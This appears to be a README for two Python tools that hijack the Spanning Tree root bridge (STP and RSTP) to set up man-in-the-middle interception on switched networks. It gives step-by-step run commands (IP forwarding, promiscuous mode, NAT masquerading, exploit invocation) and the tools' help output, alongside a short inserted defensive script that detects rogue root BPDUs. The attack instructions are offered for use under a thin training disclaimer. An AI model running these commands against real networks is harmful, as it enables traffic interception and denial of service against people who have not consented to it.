STP & RSTP Root Hijacking Exploits
The author has nothing to do with those who will use these tools for personal purposes to destroy other people's computer networks. The tools are presented for training purposes to help engineers improve the security of their network.
The basic principle of the tools is to generate an STP/RSTP frame with the lowest priority value, which in turn allows you to take over the role of the root switch. After that, an opportunity opens for a MITM attack. You will intercept traffic only partially, not all of it; keep that in mind. Also don't forget that BPDU Guard can stop you.
Before performing the injection, you should first analyze which type of STP protocol is in use, and based on this, start further... By the way, nothing prevents an attack against classic STP using the exploit for RSTP. If a MITM attack fails, feel free to experiment and try both versions of the exploits (STP exploit for RSTP, RSTP exploit for STP). Also, after the injection, the switch will generate TCN (Topology Change Notification) messages.
If there are any problems, write to "Issues".
Depending on the power of your hardware, some host traffic will go through you. You have to withstand this load, otherwise a DoS will occur.
First you need to install the dependencies.
sudo pip3 install -r requirements.txt
sudo sysctl -w net.ipv4.ip_forward=1
sudo modprobe nf_conntrack
echo "1" | sudo tee /proc/sys/net/netfilter/nf_conntrack_helper
sudo ip link set ethX promisc on
sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
sudo python3 rstpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
After executing the injection, you will take over the role of the root switch. You can track the generated STP advertisements in Wireshark or tcpdump :)
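On the defending side, the same BPDUs can be watched passively. The following is an added example (not part of this repository's tools) that parses captured STP/RSTP frames and flags any BPDU naming a root bridge other than the expected one, as well as TCN BPDUs. The expected root ID, the helper names and the sample frames are constructed for illustration.

```python
import struct

STP_DST = bytes.fromhex("0180c2000000")   # IEEE STP multicast address
LLC_STP = bytes.fromhex("424203")         # LLC header: DSAP/SSAP 0x42, UI

def parse_bpdu(frame):
    """Parse an 802.3 frame; return BPDU fields as a dict, or None if not STP."""
    if len(frame) < 21 or frame[:6] != STP_DST or frame[14:17] != LLC_STP:
        return None
    proto, version, btype = struct.unpack("!HBB", frame[17:21])
    if proto != 0:
        return None
    info = {"src": frame[6:12].hex(":"), "version": version, "type": btype}
    if btype in (0x00, 0x02) and len(frame) >= 42:   # config / RST BPDU
        flags, root, cost, bridge = struct.unpack("!BQIQ", frame[21:42])
        info.update(flags=flags, root_id=root, cost=cost, bridge_id=bridge)
    return info

def fmt_bridge_id(bid):
    """Render a 64-bit bridge ID as priority/MAC."""
    return f"{bid >> 48}/{(bid & 0xFFFFFFFFFFFF).to_bytes(6, 'big').hex(':')}"

def check(frames, expected_root):
    """Flag BPDUs naming a root other than expected_root, and TCN BPDUs."""
    alerts = []
    for f in frames:
        b = parse_bpdu(f)
        if b is None:
            continue
        if b["type"] == 0x80:                 # TCN: follows a topology change
            alerts.append(("tcn", b["src"], None))
        elif b.get("root_id", expected_root) != expected_root:
            # A numerically lower bridge ID wins the root election.
            kind = "superior-root" if b["root_id"] < expected_root else "unexpected-root"
            alerts.append((kind, b["src"], fmt_bridge_id(b["root_id"])))
    return alerts

# Constructed sample frames (not captured from a real network).
EXPECTED_ROOT = 0x8000001122334455  # assumed legitimate root: priority 32768
TIMERS = "8001" "0000" "1400" "0200" "0f00"  # port id, age, max age, hello, fwd delay
LEGIT = bytes.fromhex("0180c2000000" "001122334456" "0026" "424203" "0000000000"
                      "8000001122334455" "00000000" "8000001122334455" + TIMERS)
ROGUE = bytes.fromhex("0180c2000000" "020000000001" "0026" "424203" "0000000000"
                      "0000020000000001" "00000000" "0000020000000001" + TIMERS)
TCN = bytes.fromhex("0180c2000000" "00aabbccddee" "0007" "424203" "00000080")

if __name__ == "__main__":
    for alert in check([LEGIT, ROGUE, TCN], EXPECTED_ROOT):
        print(alert)
```

TCN BPDUs also occur during ordinary topology changes, so the `tcn` alert is only meaningful alongside a root change. BPDU Guard on access ports remains the preventive control; this check only detects.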
python3 stpexploit.py --help
▄████ ██▀███ ██▓▄▄▄█████▓
██▒ ▀█▒▓██ ▒ ██▒▓██▒▓ ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█ ██▓▒██▀▀█▄ ░██░░ ▓██▓ ░
░▒▓███▀▒░██▓ ▒██▒░██░ ▒██▒ ░
░▒ ▒ ░ ▒▓ ░▒▓░░▓ ▒ ░░
░ ░ ░▒ ░ ▒░ ▒ ░ ░
░ ░ ░ ░░ ░ ▒ ░ ░
░ ░ ░
STP Root Hijacking Exploit
For the classic version of Spanning Tree Protocol
Author: Magama Bazarov, @in9uz, <in9uz@protonmail.com>
usage: stpexploit.py [-h] --interface INTERFACE --mac EVILMAC
options:
-h, --help show this help message and exit
--interface INTERFACE
Choose the interface to attack
--mac EVILMAC Specify your MAC
python3 rstpexploit.py --help
▄████ ██▀███ ██▓▄▄▄█████▓
██▒ ▀█▒▓██ ▒ ██▒▓██▒▓ ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█ ██▓▒██▀▀█▄ ░██░░ ▓██▓ ░
░▒▓███▀▒░██▓ ▒██▒░██░ ▒██▒ ░
░▒ ▒ ░ ▒▓ ░▒▓░░▓ ▒ ░░
░ ░ ░▒ ░ ▒░ ▒ ░ ░
░ ░ ░ ░░ ░ ▒ ░ ░
░ ░ ░
RSTP Root Hijacking Exploit
For Rapid Spanning Tree Protocol version
Author: Magama Bazarov, @in9uz, <in9uz@protonmail.com>
usage: rstpexploit.py [-h] --interface INTERFACE --mac EVILMAC
options:
-h, --help show this help message and exit
--interface INTERFACE
--mac EVILMAC